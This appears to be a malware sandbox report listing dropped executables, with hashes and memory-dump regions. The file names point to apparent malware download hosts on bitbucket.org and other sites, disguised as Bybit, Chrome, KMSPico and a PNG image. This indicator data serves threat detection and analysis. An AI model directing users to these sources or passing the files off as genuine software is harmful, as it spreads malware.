C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgchermander20sonicwawedownloadsbybit.exe.exe

Filesize
13.3MB

MD5
17b81f863b1cb9fa2ba7b1d78b6039f5

SHA1
d5948798b78cbbbd775b05f3f194e57babc89c32

SHA256
8e74dad0ba6445fd3417cd79fc43dd8c367e2bdf3d8125130d08770e1b184959

SHA512
77e373129cef89a2d93a14bb74c72b9aec03a5b2e046c4cbcd47cd0e92a77d1b85474d4cdab617a4cb1ef0ce83da3695c2d419dd4b72688e30c6c22d845fb022

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgjamesom1942wiskeydownloadsSet-up.exe.exe

Filesize
18.6MB

MD5
8073361dd5d31d48eeabaf11905901ab

SHA1
efc5307058b4038c16e48173af35863dc28d11f4

SHA256
12d8444a064d4f61155b62b9ed3f1d8c0be646aef7bb321e5933e0638b52f68a

SHA512
3d3163761a93ff5ab1e0efe44da163c00f7286bca556a2b7a53e07bdad5078aa8159a0c451064e3ae787c25844feef6382bb7be7575675bf2168d9be2207de43

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgkcatelinjamesondownloadsGoogle_Chrome.exe.exe

Filesize
24.8MB

MD5
716fbe4d981ed8d90c8929e75d11285d

SHA1
1b267341fea5f76651497d3873ae714ea1736f53

SHA256
bdb358bcbb24d6e0fdab1c1638f01c55f514571a33e0a2b070c9fb6f6ddac9f0

SHA512
68916d0fd4ed3ccd9a1dbef9555f6740750677fcebcb0c7ffd7d690d6ee8beea730d07814e070317ba197aeed494a649873b95e7e14106ae92d5aff851aff9ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe

Filesize
2.6MB

MD5
19c1eed79278f09b2a9cd11f067eaef0

SHA1
69237f28f81f8aaea77507bd545bbb13a57c4c33

SHA256
0d0cb4d52455a9c074f3d9542ed6e0f363ffb8167a1f2e3d017655445e297731

SHA512
0e44a27dfda13e8bc67feb28620381cc168dd5350646601390c79441e595968573b08ab7acdc5685a736e001d83acb401f07595077df1dad4e8235673e29585c

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgnhbghnj1kjhi1adownloadsNewApp.exe.exe

Filesize
320KB

MD5
ed454d9e23e66b8693853b07d8dd266c

SHA1
102df8dbd00fba58dbebeff6a0274a50e20990e0

SHA256
4e5f7b34fc2482cd3937a20a4e4a0d56a40d40941b5aae9c8e0f173054b42a6b

SHA512
6f93b5fbac440e507c73969fac9ba1089966a6e5768ae87311e37f8032f4667949f093f030d00cfb1db703d739ddcf57d70ef41f0cfebba7c3cbb6b218310cde

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpbitbucket.orgprogrammerbfhsoftbfhdownloadsasdz2.png.exe

Filesize
2.6MB

MD5
61d3abff46a6bd2946925542c7d30397

SHA1
1fed80a136e67a5b7b6846010a5853400886ee9c

SHA256
b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa

SHA512
e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpquiz.bloomingkids.comKMSPicoInstaller.exe.exe

Filesize
8KB

MD5
f5256f26aef600f6b5afc3f62b087251

SHA1
78738715afca4f5e60bd619d1d09a50738b91188

SHA256
457b1c96ba778c12dfebc10d718bdd66ff50a253d79629d68838a191e35d1f8a

SHA512
13ecada6079a23ef18030884740326eee9d8cad0d8045f5c948aa98cb0840e2b35f38249463a2ec7e4aea93eedacbec745787beed9e72e797ad55abe2fb7157b

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsbitbucket.orgsolgoodmanzixenbergdownloadsBybit.exe.exe

Filesize
19.2MB

MD5
5714fda573903cc3a216c135ae24317c

SHA1
93da70bac751c0e81ddce05d2f38e82266a2c9d3

SHA256
dcebdabfa1a0cdbd79211415d000141b6ce923bce9817533c57a7c0450279259

SHA512
aa70cd4376ae24cbca6eee74cd53f300e6bd6653e1770c9e696fedb34725a84bd8b7d23db156dc0940c5a878b38d83abb5d78df1bc144f4f28e3c665d2051a49

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com1.exe.exe

Filesize
5.1MB

MD5
1db00ee7f85164f081e7cf05d7fa08a9

SHA1
3873ac785933719ff58d25085d66ceb5c1759e25

SHA256
a428a19abb6b3df11ef0abb1b0766df0b431400b362c1227f81ae3912f01d95c

SHA512
7f38a1fa8c1e770bd59734289668659aa8470b3d5a61842f5102b6e75ead71f13a98ccc2225df8a12a142bc125efb8851cb17c5cb59242baa2b22331553e7c10

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com2.exe.exe

Filesize
9.7MB

MD5
ac51b053655353a458b6b55f7519e56b

SHA1
577eaa28dcffff652ca513a000ec00eceddda9df

SHA256
a8bfb588ac2006a3634cf50fcf144459cb4a748ef4b69c3c8170efcf4666438d

SHA512
8901dfd2dd12f60a425ef8bb812396e953afe5094a86720b08ec9893cf3fdb8b80d8060dbf68cc5bfa7021e1b4a3e54d147ff938ebe3dea3d76086a2ef178513

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com3.exe.exe

Filesize
16.0MB

MD5
2dc8cdf825e23ff1df1ad11b3a6f1973

SHA1
82af57e0e6d7cf944148d3a16d7c8ca94fa982f8

SHA256
5d215747817125559e1a2d934c301ab466cbc956a6839c8a45f8b02b84b184d0

SHA512
3f20bb95a167d10a2998a63ab0ccd69fe81822d24a39d868d019ac0ff890067c23c015dc0be531d9531be26d6d3f44d7f11c23214ba4778e038b6844f8c8879b

Download Submit
C:\Users\Admin\AppData\Local\Temp\httpsdewatabalirental.com4.exe.exe

Filesize
728KB

MD5
58d65f5fca31cd83c18163b56b27f246

SHA1
ebb839bff73785c78d54128b235f72ce1c5c0cee

SHA256
7b827fb44a58dd2362be39abafa00a74e2f105c0fc5a5aa4ef3f3bdac5d13408

SHA512
5502a4d0e57fe051edf0098a32fce0ebe94108c841d327e773764fcf62c95dec96af772c0f8fbc56e2b7220d3189931c09905f24838eb3dc3f539dcfd3ffac5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\httptwizt.netnewtpp.exe.exe

Filesize
83KB

MD5
06560b5e92d704395bc6dae58bc7e794

SHA1
fbd3e4ae28620197d1f02bfc24adaf4ddacd2372

SHA256
9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d

SHA512
b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3

Download Submit
memory/644-397-0x0000000000E20000-0x0000000000E7D000-memory.dmp

Filesize
372KB

Download
memory/644-400-0x0000000000E20000-0x0000000000E7D000-memory.dmp

Filesize
372KB

Download
memory/768-367-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download
memory/768-371-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download
memory/768-369-0x0000000000710000-0x000000000076D000-memory.dmp

Filesize
372KB

Download
memory/1092-133-0x0000000061E00000-0x0000000061EF3000-memory.dmp

Filesize
972KB

Download
memory/1092-132-0x0000000002D70000-0x0000000002FD3000-memory.dmp

Filesize
2.4MB

Download
memory/1092-173-0x0000000000400000-0x0000000000E2A000-memory.dmp

Filesize
10.2MB

Download
memory/1092-203-0x0000000002D70000-0x0000000002FD3000-memory.dmp

Filesize
2.4MB

Download
memory/1484-249-0x0000000004C40000-0x0000000004CD2000-memory.dmp

Filesize
584KB

Download
memory/1484-248-0x0000000005150000-0x00000000056F4000-memory.dmp

Filesize
5.6MB

Download
memory/1484-250-0x0000000004C10000-0x0000000004C1A000-memory.dmp

Filesize
40KB

Download
memory/1484-245-0x0000000000290000-0x000000000034C000-memory.dmp

Filesize
752KB

Download
memory/1504-260-0x0000000000BA0000-0x0000000000BF9000-memory.dmp

Filesize
356KB

Download
memory/1504-257-0x0000000000BA0000-0x0000000000BF9000-memory.dmp

Filesize
356KB

Download
memory/2136-353-0x0000000000520000-0x0000000000577000-memory.dmp

Filesize
348KB

Download
memory/2136-349-0x0000000000520000-0x0000000000577000-memory.dmp

Filesize
348KB

Download
memory/2136-351-0x0000000000520000-0x0000000000577000-memory.dmp

Filesize
348KB

Download
memory/2164-461-0x000001E4F9D30000-0x000001E4F9D4C000-memory.dmp

Filesize
112KB

Download
memory/2164-462-0x000001E4FA0C0000-0x000001E4FA175000-memory.dmp

Filesize
724KB

Download
memory/2164-463-0x000001E4F9D50000-0x000001E4F9D5A000-memory.dmp

Filesize
40KB

Download
memory/2164-464-0x000001E4F9D80000-0x000001E4F9D9C000-memory.dmp

Filesize
112KB

Download
memory/2164-465-0x000001E4F9D60000-0x000001E4F9D6A000-memory.dmp

Filesize
40KB

Download
memory/2164-466-0x000001E4FA2E0000-0x000001E4FA2FA000-memory.dmp

Filesize
104KB

Download
memory/2164-467-0x000001E4F9D70000-0x000001E4F9D78000-memory.dmp

Filesize
32KB

Download
memory/2164-468-0x000001E4F9DA0000-0x000001E4F9DA6000-memory.dmp

Filesize
24KB

Download
memory/2164-469-0x000001E4FA2C0000-0x000001E4FA2CA000-memory.dmp

Filesize
40KB

Download
memory/2188-372-0x00007FF6047C0000-0x00007FF6047E9000-memory.dmp

Filesize
164KB

Download
memory/2188-375-0x00007FF6047C0000-0x00007FF6047E9000-memory.dmp

Filesize
164KB

Download
memory/3136-2-0x00007FFDE1663000-0x00007FFDE1665000-memory.dmp

Filesize
8KB

Download
memory/3136-53-0x00007FFDE1660000-0x00007FFDE2121000-memory.dmp

Filesize
10.8MB

Download
memory/3136-0-0x00007FFDE1663000-0x00007FFDE1665000-memory.dmp

Filesize
8KB

Download
memory/3136-1-0x0000014B4DCA0000-0x0000014B4DCAA000-memory.dmp

Filesize
40KB

Download
memory/3136-3-0x00007FFDE1660000-0x00007FFDE2121000-memory.dmp

Filesize
10.8MB

Download
memory/3252-296-0x00000000012F0000-0x0000000001313000-memory.dmp

Filesize
140KB

Download
memory/3252-307-0x00000000012F0000-0x0000000001313000-memory.dmp

Filesize
140KB

Download
memory/3252-377-0x00000000010F0000-0x000000000114C000-memory.dmp

Filesize
368KB

Download
memory/3252-380-0x00000000010F0000-0x000000000114C000-memory.dmp

Filesize
368KB

Download
memory/3252-303-0x00000000012F0000-0x0000000001313000-memory.dmp

Filesize
140KB

Download
memory/3252-374-0x00000000010F0000-0x000000000114C000-memory.dmp

Filesize
368KB

Download
memory/3376-290-0x0000018FFAD20000-0x0000018FFAD42000-memory.dmp

Filesize
136KB

Download
memory/3472-98-0x0000000007E40000-0x0000000007E5A000-memory.dmp

Filesize
104KB

Download
memory/3472-64-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/3472-94-0x0000000007D80000-0x0000000007E16000-memory.dmp

Filesize
600KB

Download
memory/3472-93-0x0000000007B70000-0x0000000007B7A000-memory.dmp

Filesize
40KB

Download
memory/3472-92-0x0000000007B20000-0x0000000007B3A000-memory.dmp

Filesize
104KB

Download
memory/3472-91-0x00000000081A0000-0x000000000881A000-memory.dmp

Filesize
6.5MB

Download
memory/3472-96-0x0000000007D40000-0x0000000007D4E000-memory.dmp

Filesize
56KB

Download
memory/3472-99-0x0000000007E20000-0x0000000007E28000-memory.dmp

Filesize
32KB

Download
memory/3472-97-0x0000000007D50000-0x0000000007D64000-memory.dmp

Filesize
80KB

Download
memory/3472-61-0x0000000003150000-0x0000000003186000-memory.dmp

Filesize
216KB

Download
memory/3472-62-0x0000000005890000-0x0000000005EB8000-memory.dmp

Filesize
6.2MB

Download
memory/3472-63-0x0000000005790000-0x00000000057B2000-memory.dmp

Filesize
136KB

Download
memory/3472-95-0x0000000007D20000-0x0000000007D31000-memory.dmp

Filesize
68KB

Download
memory/3472-90-0x00000000079C0000-0x0000000007A63000-memory.dmp

Filesize
652KB

Download
memory/3472-65-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/3472-75-0x0000000006190000-0x00000000064E4000-memory.dmp

Filesize
3.3MB

Download
memory/3472-89-0x0000000006DE0000-0x0000000006DFE000-memory.dmp

Filesize
120KB

Download
memory/3472-79-0x000000006F590000-0x000000006F5DC000-memory.dmp

Filesize
304KB

Download
memory/3472-76-0x00000000067C0000-0x00000000067DE000-memory.dmp

Filesize
120KB

Download
memory/3472-77-0x0000000006800000-0x000000000684C000-memory.dmp

Filesize
304KB

Download
memory/3472-78-0x0000000006DA0000-0x0000000006DD2000-memory.dmp

Filesize
200KB

Download
memory/4148-347-0x00007FF6282F0000-0x00007FF628887000-memory.dmp

Filesize
5.6MB

Download
memory/4240-320-0x0000000006B10000-0x0000000006B5C000-memory.dmp

Filesize
304KB

Download
memory/4240-314-0x00000000061A0000-0x00000000064F4000-memory.dmp

Filesize
3.3MB

Download
memory/4604-405-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4604-402-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4604-395-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4604-393-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4604-348-0x00000227F5730000-0x00000227F5750000-memory.dmp

Filesize
128KB

Download
memory/4604-376-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4604-373-0x00007FF6447C0000-0x00007FF644FAF000-memory.dmp

Filesize
7.9MB

Download
memory/4648-130-0x00000000008D0000-0x00000000008D6000-memory.dmp

Filesize
24KB

Download
memory/4748-301-0x00007FF76F2E0000-0x00007FF76F877000-memory.dmp

Filesize
5.6MB

Download